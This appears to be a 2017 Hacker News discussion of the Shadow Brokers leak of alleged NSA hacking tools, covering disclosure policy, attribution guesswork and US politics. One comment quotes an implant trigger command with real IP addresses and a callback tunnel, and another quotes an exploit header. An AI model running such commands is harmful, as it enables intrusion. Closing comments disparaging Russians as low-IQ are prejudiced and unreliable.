When Federal agencies discover a new vulnerability in commercial
and open source software – a so-called “Zero day” vulnerability
because the developers of the vulnerable software have had zero days
to fix it – it is in the national interest to responsibly
disclose the vulnerability rather than to hold it for an investigative
or intelligence purpose.
https://icontherecord.tumblr.com/post/82416436703/statement-...
> Unless there is a clear national security or law enforcement need, this process is biased toward responsibly disclosing such vulnerabilities.
...due to the fact that most of the EQG vulnerabilities appear to be crafted for specific collection targets, not stumbled upon and held onto for fun.
Intuitively it seems when the same agency performs both roles it creates a conflict of interest and bias against disclosure.
The origin of 0-day (zero-day) in hacking (etymology of zero-day): http://bjorn.kuiper.nu/tag/zero-day/
I've looked through some of the contents.. Some look incredibly old, but others target odd things.. lots of cPanel. My only guess is take the low hanging fruit to build "jump box" type systems?
Some odd examples: ElegantEagle/toffeehammer.. focuses on cgiecho for RCE. The thing is, a CVE was just released for this case maybe a month ago?: http://www.cvedetails.com/cve/CVE-2017-5613/
So if this dump was from 2013, why did the CVE recently pop up? Or is that coincidence?
And the idea that you can figure out where someone is from by analyzing their written text is as fascinating as doing the same to their code.
That idea is quite well known, so it's likely that the post was written like that deliberately. I was just wondering if you could create a similar sounding post with a chain of people rewriting the original in their own words.
2017 in a nutshell right there.
Or it is Russian and they intentionally formulated this as cartoonesque Russian, so that everyone says "this can't possibly be Russian, it's someone who tries to put the blame on Russia".
The problem is that if this comes from a government power, it is likely that they have the resources to use some professional translators and/or linguists to make it look whatever they want it to look like.
Anything here that is not backed by other data is just pure speculation.
"TheShadowBrokers is having special trick or treat for Amerikanskis tonight."
https://medium.com/@shadowbrokerss/message-5-trick-or-treat-...
I suppose though, that "Amerikanski" might be used outside Russia. Serbia, Bulgaria? Misdirection seems more likely though.
A much more common mistake you will find is not knowing when to use "the" or "a".
Edit: unless it is a Russian pretending to be an American who is pretending to be Russian which, who the hell knows, anything is possible.
In English, the noun describing the nationality is also an adjective describing belonging to, or affiliation with, that nationality. E.g. "An American is driving an American car".
In Russian, this is not the case - they are different words, sharing the same root. Some examples (noun - adjective):
US: Amerikanets - Amerikanskiy EN: Anglichanin - Angliyskiy DE: Nemets - Nemetskiy AR: Arab - Arabskiy CN: Kitaets - Kitayskiy
There's one and only one exception, and that, ironically, is the word for "Russian": "russkiy". It's the same for both the noun and the adjective, and, as you can see by comparing it with the list above, morphologically it looks like an adjective. The historic explanation for that is that it originated from the time of the Varangian conquest of Eastern Slavic lands, when the population was referred as "the people of [belonging to] Rus" - "Russkie lyudi" - where Rus was the name of the Varangian tribe in question.
Anyway, what this means is that no native Russian speaker would use the word "Amerikanskiy" to refer to Americans. It only makes sense as an adjective in "American something". However, the addition of "-s" at the end to indicate plural unambiguously tells us that whoever wrote this, treated it as a noun. Which would make perfect sense for a native English speaker, for whom the two are naturally conflated.
And the most obvious explanation for that is that if you put the word "American" by itself into Google Translate, for example, it can't decide whether it's a noun or an adjective without context, so it has to assume one or the other. And it seems to be assuming adjective by default, so you get "Amerikanskiy" back.
Oh, and by the way, writing it as "Amerikanski", without the final "y", is also something that hints strongly that it's not a native speaker. A native speaker would likely transliterate it letter by letter, starting from Russian "Американский", yielding "Amerikanskiy". However, that final "y" is really short when spoken, which is why native English speakers often miss it entirely when transcribing.
On top of that, Polish uses "-ski" for the same words: "polski", "rosyjski", "angielski", "arabski" etc. In Polish, it's also a very common (and etymologically related - think "of ...") ending for last names - e.g. Piłsudski. There are a lot more Poles, or at least families with Polish ancestry, in US in particular than there are Russians. As a result, Polish last names are pretty common and well-known, as is their spelling. So, that spelling is often applied to vaguely similarly looking and sounding Russian loanwords and transliterations, which also leads to dropping of that final "-y" in "-skiy".
So, definitely not Russian, and overall slightly more probable to be a native English speaker from US.
That's, of course, assuming that the wording wasn't deliberately mangled to look like fake Russian, in a double misdirection...
Sounds like a villain from a 60's Bond flick.
Anyway, while their nationality isn't obvious, their childishness is. I think that's the only detail that can really be gleaned from the text itself.
"Quick review of the #ShadowBrokers leak of Top Secret NSA tools reveals it's nowhere near the full library, but there's still so much here that NSA should be able to instantly identify where this set came from and how they lost it. If they can't, it's a scandal."
The security agencies might have made a lot of enemies over the years so it's not clear who benefits from this. Either financially or as ego boost.
The internet is definitely bigger than what most people might have predicted 20 years ago. So it's not really a big surprise to see as much or even more power struggle than in real world battle fields.
Since every side has a propaganda to peddle, I, personally can draw no reasonable or coherent conclusions on what type of decisions are shaping the world I live in. But I am nonetheless curious to see how this all plays out in the coming years.
There is a related post on HN about this. [0]
---------------------------------
I don't necessarily subscribe to the whole "Russia is controlling everything" line (there's still so much that's unknown for sure), but it sure is easy to see a connection between Trump launching missiles against Syria which is supported by Russia, and with an embarrassing and costly release of secret information belonging to the security apparatus in the U.S. by what many people say is a front for the Russian security apparatus. Whether that connection is really there is another thing, but that narrative sure is easy to follow.
I have difficulties interpreting your statement. Are you implying US security services are "a front for the Russian security apparatus"?
I wouldn't interpret that tweet as "lost control of its full arsenal". It seems to say that, but then it's a tweet and length-limited. Maybe let's just wait until a more nuanced analysis surfaces?
B) This dump is from 2013, not long after Snowden left, so still relevant to his knowledge on the subject. Although he wasn't trained for TAO.
It couldn't be because perl is installed by default on all of the target platforms. Practicality trumps conference talks when there's work to be done, even in the government.
Whereas, the NSA's project failed initially because the team couldn't design a security kernel that had great security and acceptable performance. Told NSA they'd have to pick one. Schell told NSA he knew a guy with a design, GEMSOS, with both properties. NSA reluctantly used GEMSOS in BLACKER. The first, highly-secure VPN w/ general-purpose kernel was born. Who knows what the deployment or usability side of it was, though. Classification rules kept them from publishing on it for a decade or so where it then got paywalled. Classification is probably why Larry Wall didn't say much about BLACKER when describing its history. At least ones I read.
A few points of note: it's rather weird to call BLACKER a "VPN"; it's likely much broader than this (it's a network, crypto suite, secure kernel, system architecture, etc), and yet encompasses a very different goal. In fact, the degree to which it originates out of secure kernel research is, we argue in our paper, somewhat unclear, and perhaps this is only a small part of the equation.
If anyone has any additional information about these early architectures, I would love to speak with you, contact me at http://iqdupont.com.
To me it seems impossible that non-state-sponsored hackers would have gotten their hands on top secret NSA hacking tools. If I had to guess, it would seem that TheShadowBrokers are "useful idiots" that Russia gives information in the way they did (probably) with Wikileaks. The real question is why would anyone leak these files at this very moment? Did it take this long to get angry at Trump or are there some other factors at play?
About as impossible as the Snowden exfiltration, so that makes it entirely believable.
All it takes is one rogue employee or plant. And if you don't want to burn an inside asset it would pay off to release files that are several years old.
# ELATEDMONKEY is a local privelege escalation exploit against systems running the cPanel Remote Management Web Interface, at least through version 24, and probably future versions too (althogh that should be checked before throwing).
It has been tested explicitly on cPanel 11.23.3 and 11.24.4 running CentOS 5.2 Linux
--
Those versions are from 2008/2009
Don't underestimate the ability of failing smbs to dismiss the risks involved with that when they can't pay to fix it.
He notes that though much is targeted at older systems, a few things that look yet-unpatched.
https://twitter.com/ncweaver/status/850797548717481984
the grugq: "Calling it now: the first ShadowBrokers dump was an expensive signal. This latest one was not (expensive, that is.)"
- Don’t care if you swapped wives with Mr Putin, double down on it, “Putin is not just my firend he is my BFF”.
- Don’t care if the election was hacked or rigged, celebrate it “so what if I did, what are you going to do about it”.
This has got to be a fake group trying to discredit Trump right? I don't like him or what he's doing, but surely surely his supporters don't subscribe to at least the latter view there?
You must not have very many conservative friends on Facebook. "Russia didn't write the emails" has to be one of the most popular memes of the last 6 months.
I don't know any conservatives but every single leftist I know thinks that russophobia is at absolutely deranged levels, as a vehicle for Clinton apologism.
The idea that "Russia decided the election" is absurd, but repeated often enough, is starting to be taken as truth by those who find it palatable.
Also, a lot of the tools appear to instruct people to paste various things in to them. I find it unlikely that a single person wrote all the tooling for the NSA, but, who knows.
This is just inaccurate, or at least purposefully misleading. The NSA did not just lose control of its "Top Secret arsenal of digital weapons".
They "lost control" of mainly a bunch of old exploits whose release will not matter because anyone who is running this old junk won't be updating their servers because of this news.
211.40.103.194 - http://utc21.co.kr - Korea
from: https://github.com/x0rz/EQGRP/blob/master/Linux/etc/opscript...
#### JACKLADDER - triggering IN thru JACKPOP on Linux (FAINTSPIRIT) ####
### Local window, let this sit and wait: ourtn -T 202.38.128.1 -n -I -ue -O 113 -p 443 -C 211.40.103.194 127.0.0.1
### on PITCH: set up window for nopen callback -nrtun 113
https://github.com/x0rz/EQGRP/blob/master/Linux/bin/xp_phpbb...
I only found that bad boy out after disabling some ciphers on some loadies which broke a lot of their stuff....
It looks like it's searching for files/directories with unusual names (like ". ") that system administrators wouldn't normally notice.
I'm not from the US and have not followed the news from there recently, but from what little I have seen much of the actual contents of the message does seem to reflect the feelings of Trumps "base"? Or would people more familiar with US politics say this is incorrect?
"Are you the sort of man who would put the poison in his own goblet? Now a clever man would put the poison into my goblet, because he would know that only a fool would drink the goblet given to him. I am not a fool, so clearly you wouldn't do that. But you must have known that I was not a great fool, so I mustn't drink from the wine in front of me!" [0]
Remember that even naming these two countries is a bias unless there is specific evidence. America and Russia are obvious suspects, but other countries (and even non-state actors).
There is very little actual evidence and far too much time spent on useless - and distracting - speculation.
> Even HN seems to have a "of course it's Russia" bias these days.
I suspect a lot of people are still using cold war era standards for how propaganda works. The modern methods[1] are a lot more subtle. A potential example might be this very thread where a lot of people seem to be wasting time speculating about the leak's origins instead of looking at the actual evidence that is available: the software itself.
[1] e.g. Russia's "non-linear warfare" methods that introduce as much confusing/distracting chaos as possible, or the psychological wedges JTRIG (GCHQ) uses to split communities before they grow into larger "problems".
Russians are known for what they themselves call "asymmetrical answers", so this seems to fit the pattern.
Source: many conversations with Russians learning English (also near-native Russian)
ALLL RIIIIGHT!!
Not because I'm especially interested in the tools (although, granted, I have not had a look at any of them yet), but because I always wished this could be given to everyone.
Also, for a moment there, I was concerned 7z was insecure and that the passphrase had been bruteforced. Apparently not! Very nice.
This is a disaster in my (current) opinion. We tend to dismiss the work the likes of NSA do, not thinking much about what would happen if they didn't do it. Snowden categorically dismissing anything that NSA does, just means he's a deluded idealist, much like I used to be.
That's not representative of Snowden's opinion at all. From the beginning he's always stated he believes in the mission of the intelligence agencies. Heck, he used to work for one.
"I am not trying to bring down the NSA, I am working to improve the NSA" [0]
[0] https://www.washingtonpost.com/world/national-security/edwar...
We make a kind of deal with our governments, some things we agree to be kept in the dark about for security reasons (specific intelligence or some clandestine operation or other) but I don't think that deal covers the kind of surveillance Snowden exposed and I don't see at all how exposing the actions of our governments is deluded or idealistic: can you elaborate?
Why would you prefer not to know what your government is doing when knowing doesn't break the 'willful ignorance' contract we entrust these people with?
If two terrorists agree to act when a nyan cat is posted on a specific Facebook account no neural network can help you manage the threat. Human based investigation and infiltration on the other hand can lead to real world judiciary actions.
Then, of course, there's also the objection that "keeping us safe" is not an absolute. There are many ways to keep people safe, but they're so extremely onerous that we don't practice them. Totalitarian societies with pervasive open surveillance (think 1984) are very safe, for example, but at what cost? So clearly there's a balance, and one can't just dismiss any concerns about the cost of that safety by saying that it's necessary - it has to be demonstrated that it is (i.e. that the gains from that increased safety justify the losses from intrusiveness).
"Just because you shot Jesse James, don’t make you Jesse James.”
Snowden is skilled at data theft and not a source of wisdom when it comes to surveillance.
The liberal media (hate to use that term) is equally complicit. They have trotted him around as source of wisdom. The leaker of Pentagon Papers had a position that allowed him to assess the subject matter. Snowden on the other hand was a sysadmin.
A lot of people died, it would be naive to think Snowden's actions didn't contribute to it. However noble his intentions might be.
https://www.youtube.com/user/FPSRussia
100% American from Georgia, sometimes loses Russian accent and slips into perfect English:)
Could be Russia pissed about puppet twitching without permission, or could be Bannon (via Cambridge Analytics?) pissed about puppet twitching without permission.
Twitch, puppet, twitch!
but really, asymmetric information is asymmetric. We just don't know.
But now we can speculate that they are American citizens, with their mention of voting for the US President.
We've detached this subthread from https://news.ycombinator.com/item?id=14069328 and marked it off-topic.
Identifying specific malicious actors (and their origin) is tricky from a reader's POV, so the best I can personally do is not let ridiculous statements go unanswered. Ignorance is more common than malice, but I'm sure there's a bit of both in here today.
Or so a 2017 version of the "red scare" goes, so that the military industrial complex can sell more weapons and more "safety", and the fingers can keep being pointed at some enemy or another. That way their budgets get approved, some poor countries pay the toll (who cares anyway), and they might even be able to plunder them afterwards. Worked wonders the last 30+ years.
Not to mention that the US sponsors tons of NGOs, magazines, organizations, events, political parties, etc, with favorable views to its interest all over the world, and has done that nonstop since at least WWII, meddling with elections, paying journalists, etc -- and when nothing else works.
It is Russians. The classic example of Dunning Kruger effect. In a generally low IQ environment and primitive criminalized cultural environment they truly believe that what is enough to fool everyone around them, including the bosses (who are supposed to be really smart), will surely fool everyone else.
This is the phenomenon of negative selection of a cancer-like corrupted society (which has run for three decades already) at work. They are literally decades behind the technological progress and culture of the modern civilization.
They simply have no idea of what possible level of intelligence and sophistication could be found in places with decades of consistent high-IQ-based selection, like companies staffed with top 5% of MIT/Stanford/Caltech/Berkeley graduates and what this kind of organization could do (think of Apple, Google, etc).
A high-tech US govt agency would never have had such crap in their folders. They are not a bunch of disconnected from reality, overconfident, self-deluded with their own primitive propaganda Russian punks.